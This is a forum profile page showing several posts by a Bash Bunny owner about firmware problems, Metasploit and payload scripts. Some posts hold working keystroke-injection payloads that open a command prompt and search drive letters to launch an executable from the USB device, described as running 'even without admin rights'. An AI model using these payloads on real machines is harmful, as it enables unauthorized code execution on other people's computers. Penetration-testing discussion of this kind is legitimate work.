Jump to content

hoppler

Active Members
  • Content Count

    8
  • Joined

  • Last visited

About hoppler

  • Rank
    Hackling

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Well, I'll answer myself, before somebody else runs into the same problems thinking the Firmware doesn't work. Here's the little story: I installed Firmware 1.6. So far, so good. But when I logged into the Bash Bunny I could only see : "udisk" and "Version.txt". Before I made the update I could see something like "ATTACKMODE", "TOOLS" and many other Directorys/Files. After I installed the new Firmware 1.6. there was only what I mentioned above. Well, I'm not good with linux, but I'm not a quitter. so I started digging deeper into the BB. And I got the
  2. I used the Bunnyupdater on a windows Machine to update my BB to the new Firmware 1.6. Then I tried to install the Tools by copy the .deb files to the Tools Folder. Save ejecting and reinseting. Everything seems to be o.k., BUT when I log into to linux Terminal of the BB via Putty I just have ONE Folder "udisk" and a "version.txt" File. What's wrong here??? Please help.
  3. Hello everybody, I'm a proud owner of the Bash Bunny. Well, I read recently that there was an update. So the BB is capable of running metasploit. Great! But now: How do I use it? Besides: I've seen a video where somebody pluged in the BB and almost instantly there was a Linux Terminal, running from BB. Is THIS possible and if, how can I do that? It would be really great if somebody could do a step by step tutorial. Because I'm wondering if it's possible to run Kali Linux (especially meterpreter) instantly from the BB? I'm a neew
  4. Wow, thank you for this straight answer. Now I get the picture. But I figured out a way to run an executable through command - even without admin rights. Maybe somebody could use it. Here is my solution: Note: if you need different keyboard layout, add this: DUCKY_LANG gb - or anything else Payload.txt: ATTACKMODE HID STORAGE LED R SLOW Q GUI r Q DELAY 500 Q STRING cmd Q ENTER Q DELAY 500 Q STRING "for /l %a in (0) do ( for %a in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %a:/my_folder/my.exe (
  5. Hello. I have following payload: LED SETUP ATTACKMODE HID STORAGE GET SWITCH_POSITION LED ATTACK if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.txt" ]; then QUACK ${SWITCH_POSITION}/my_script.txt LED FINISH fi Well, my_script.txt get's executed. Great. But now my question: Why it is'nt working if I change "my_script.txt" to "my_script.exe". if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.exe" ]; then QUACK ${SWITCH_POSITION}/my_script.exe LED FINISH fi Or is there a nother eas
  6. Well I guess I have to answer my own question. Q DELAY 500Q STRING for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %d:/payload/switch1/test.exe (start %d:/payload/switch1/test.exe & exit)Q ENTER Problem was: Double quotes are missing: Q DELAY 500Q STRING "for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %d:/payload/switch/test.exe (start %d:/payload/switch/test.exe & exit)"Q ENTER And now it runs smoothly. Thanks to myself.
  7. Sorry, code got messed up: Here the right one: ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q STRING cmd Q ENTER LED Y Q DELAY 500 Q STRING for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %d:/payload/switch/test.exe (start %d:/payload/switch/test.exe & exit) Q ENTER LED W
  8. Hello, first of all, I am a proud owner of the Bash Bunny. So far so good, but there are a problem I can not resolve. I have a payload in switch 1: ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q DELAY 500 Q STRING cmd Q ENTER Q DELAY 500 for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %d:/payload/switch/test.exe (start %d:/payload/switch/test.exe & exit) Q ENTER If I put this manuallz in the cmd window everzthing works fine. But if I start the BB it does
×
×
  • Create New...